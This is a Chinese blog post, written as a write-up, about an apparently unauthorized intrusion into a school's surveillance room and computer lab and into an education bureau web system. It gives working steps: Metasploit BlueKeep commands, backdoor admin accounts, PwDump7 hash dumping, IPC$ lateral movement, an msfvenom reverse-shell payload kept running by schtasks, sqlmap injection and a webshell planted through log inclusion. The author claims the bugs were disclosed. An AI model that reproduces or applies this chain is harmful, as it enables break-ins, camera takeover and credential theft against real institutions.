從監控系統到機房再到教育局某部sql+getshell

前言

某師傅說過，學安全的沒入侵過自己學校那他的安全生涯肯定會感覺少了點什么，今天就簡單記錄下對學校的一次滲透過程，總體難度。文中出現的漏洞已提交至【教育漏洞報告平臺(EDUSRC)】和【國家信息安全漏洞平臺(CNVD)】切勿打再次復現的主意。

思路設計

學校沒有做網站，所以通過外網打進去也就走不通了，學校也沒發VPN或者校園網之類的所以連VPN打內網也走不通，做個USB直接隨便找臺學校辦公室電腦插。。沒膽量也違法，所以只能搞近源。。也是最麻煩的，也是我拖了這么久的主要原因。

(近源滲透：指測試人員靠近或位于測試目標建筑內部，利用各類無線通信技術、物理接口和智能設備進行滲透測試的方法總稱，說通俗一點就是要打一個學校就跑到學校旁邊靠近學校打，一般常見的攻擊方法都是遠程網絡而近源不是很常用，近源攻擊在護網中比較常用) 

先是思路設計，因為一個人在拿著設備在學校門口一直鬼鬼祟祟的坐著肯定不是很妥，所以我在家先是設計了兩套滲透思路，準備稍晚點沒人再去然后速戰速決。

注意：任何侵害設備安全及其篡改數據的滲透測試都是違法行為，即使已獲取授權，本次滲透最后都已對上傳的馬進行了清除。

思路1簡單概括

如果滲透整體比較簡單話，就在門口直接拿下學校設備不在出網上線了，不對任何數據進行篡改。

思路2簡單概括

如果整體網絡線比較復雜，那就先把能拿下的機子傳后門上線，回家再慢慢遠控學校的機子一步步拿，不對任何數據進行篡改。

備用思路2-1簡單概括

技術太菜，最后無功而返。。因為沒有一次滲透是在滲透前就能完全保證成功的。

整體滲透思路圖詳細梳理

這次的目標花某想的是整個監控室和整個微機室房也是學校主要分布計算機網絡的地方，每個教室都是配備了電子白板的這些大家知道，但是居花某所知每次放學和沒課時白板都會關機。

上面是一副思路簡圖，也是本次滲透的基本思路。

監控室的位置居花某所知是在1樓的位置，每次放學都會路過，但是記不清是幾號了，微機室的位置是在2樓，同樣記不清號是20幾了，而1樓和2樓同樣分布有大量的教室和辦公室，所以網絡分布還是很雜的，但同時這兩個也是比較好分辨的，辦公室的計算機通常來說沒人用會關機，教室里就更不用說了上面花某也說過每個教室聯網的可能就只有一個電子黑板了，而放學后會關機下網，所以說除去辦公室和教室放假已下網的設備，像監控室和服務器這類上網設備還是比較簡單掃出來的。

實戰過程

監控系統

先到學校門口，連內網，kali破wifi密碼太費時間了，花某出門的時候時間也不早了所以打算上魔法，直接拿wifi萬能鑰匙軟件先連上wifi再說，很久沒用了，剛打開就撲面而來廣告，然后還要充會員。。要不然不能免費破解我要連的這個wifi。

然后花某突然想起來之前有佬給我發過一個web下載站，然后打算去那看看有沒有wifi萬能鑰匙的破解版。

果然有，下載安裝后直接找個wifi連上，這邊有個不算tips的tips的就是外面連wifi的時候要選擇哪個連，因為學校周邊也有商戶wifi住戶的wifi，其實很簡單，學校的wifi命名規則一般都是辦公室門牌號之類的，花某這邊也是這樣連了，因為我的位置離教學樓1樓較近所以是可以連到1xx的wifi的。

連上之后先訪問

192.168.1.1

看看能不能進路由器管理界面

試試網關初始密碼

。。我明明輸了一次密碼他提示輸入3次 錯誤鎖了一分鐘，但是初始密碼被改了，也不存在備份文件讓我們解密，所以打算繼續收集。 

192.168.1.1:8080

剛訪問就彈這個。不知道什么問題但是不管了，關閉彈窗8080端口可以恢復出廠，這是一個突破口，但是在開頭說了不能破壞設備數據所以這個點不做利用了。

放棄這點之后想到試試wifi密碼為管理員登錄密碼。

成功登錄，但是找了一圈就只發現幾個連接了wifi的電腦設備沒有我想要的服務器啊攝像頭智能設備之類的連接這個wifi，網關這塊先放放打算去掃C段。

有3臺設備，1臺有MS17，先反彈shell拿下這臺機子，這臺機子一下就反彈了shell本來以為沒有殺軟但是后面連了桌面之后發現是有360了，但是這個360不知道多久沒更新了。

連上了，添加用戶在遠程連接桌面控制。

net user admin 123456 /add

net localgroup administrators admin /add 

第一條命令是添加一個賬戶：admin 密碼：123456的用戶

第二條命令是將admin設置為管理員

然后遠程連接：rdesktop 192.168.xx.xxx

成功連接

連上之后繼續，試試機子有無突破口，可以搞到其它兩臺上的，這邊雖然說我只掃到3臺設備但是不一定在目標1樓中只存在這3臺上網設備，因為1樓無線網還有幾個只是我的位置比較靠后，接收不到其它wifi的信號，所以只能判斷的是在我們連接的本wifi里上網的設備只有3個但是目標1樓的其它wifi下的上網設備就不一定了，其實拿下這臺設備連接桌面沒看到監控畫面其實也能猜到這3臺機子并不是監控室的那幾臺機子，原因是因為監控室下的設備肯定不只三臺是有多臺設備共同顯示監控畫面的，所以繼續信息收集找突破。

瀏覽器歷史記錄發現某教育局xx部的管理員登錄歷史，這個是用ip訪問的先做一個收集后面再試試。

開了瀏覽器保存密碼，所以這個系統的密碼也知道了但是目前的目標是機房和監控所以先放放。

沒采集到啥信息，所以打算換wifi繼續找其它目標，因為我位置比較靠后所以接手不到其它wifi的信號，而且天也不早了所以打算先讓這臺機子上線回家慢慢理。

回家后還是打算先從wifi入手，打算直接用遠控的這個機子發動攻擊

先連wifi，為了節省大家的時間我這邊直接略過前幾個試錯的過程連了3個都沒有設備試到第四個的時候c段存在大量設備

并且設備端口之類的相似性極高打到這里隱約能猜到是監控室的終端了。支持3389所以試試CVE-2019-0708，漏掃掃到的還有其它內網較常見的，復現前面幾個的時候老是打成藍屏。。。不敢打了用這個打的時候才勉強沒藍屏。

CVE-2019-0708:當未經身份驗證的攻擊者使用RDP連接到目標系統并發送經特殊設計的請求時，遠程桌面服務中存在遠程執行代碼漏洞

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
 
set rhosts 192.168.xx.xxx # s
run

顯示可以利用

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.xx.xxx
set target 4
exploit

成功反彈shell，然后讀取密碼遠程登錄，這邊不直接添加用戶連接桌面是因為如果是顯示監控畫面如果新加用戶有時候桌面是會新建的導致我們連接沒看見監控畫面誤以為打錯了，之前有過一次這樣的經歷所以這次避坑。

監控拿下了，沒細數這些機子下的監控數量，但是看畫面基本上是比較全的。

機房

拿完監控就是機房了，打機房整體來說難度也是適中的，先是連wifi，和機房控制機是同段的，還是直接舍去無用的地方直接給大家放一下有用的內容。用MS15-034拿下其中一臺機子的shell，然后就是橫向滲透，橫向的基礎就是抓取Hash密碼，花某用的也是之前常用的PwDump7，下載到shell機然后管理員權限運行：

PwDump7.exe

獲得Hash然后解密獲取明文密碼。

破解Hash工具：https://ophcrack.sourceforge.io/tables.php

用戶名：xxxx

密碼 ：xxxxx

其實還有很多工具可以直接抓取明文密碼不用解密但是花某習慣PwDump7而已，師傅們用Mimikatz之類的也可以。然后利用IPC進行橫向滲透：

Net use \\<目標IP>\ipc$ “password” /user:”username”

然后利用msf生成一個木馬的.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST= 域IP LPORT=  9991 -f exe > shell.exe

然后發送到目標機器上：

copy shell.exe \\目標IP地址\c$

然后需要讓它執行shell.exe的木馬文件，得配合任務管理。

schtasks /create /s 目標IP /uusername /p password /tn flower /sc minute /mo 1 /tr shell.exe的路徑 /ru system /f

用schtasks命令創建叫flower計劃任務讓目標機每1分鐘運行一次shell.exe的文件

監聽開啟反彈shell，連接桌面，成功獲取機房控制權。

熟悉的控制軟件。

教育局某部sql注入

不知道師傅們還記得花某再開頭說的拿下一臺機子然后查看瀏覽器歷史的時候發現的IP站點的管理后臺嗎，還有瀏覽器保存的密碼。這邊直接拿來登錄：

文章字數有點多了所以花某簡單點直接放過程了，特別簡單的一個sql注入屬于是撿洞了。發現存在查詢功能：

簡單測試發現存在sql注入，然后直接標明注入點直接拉到sqlmap一把梭就行，無waf。

教育局某部getshell

利用漏洞是文件包含漏洞：瀏覽功能點的時候發現存在登錄日志查看功能

查詢點依舊存在sql注入但是同點已經利用過了所以不在做利用，直接抓包在日志點插入一句話：

蟻劍連接：

總結

整體難度適中，這次滲透后面的web滲透出奇順利，沒找到前端頁面，但是后端安全做的比較松散，前面的近源和打域控累死人。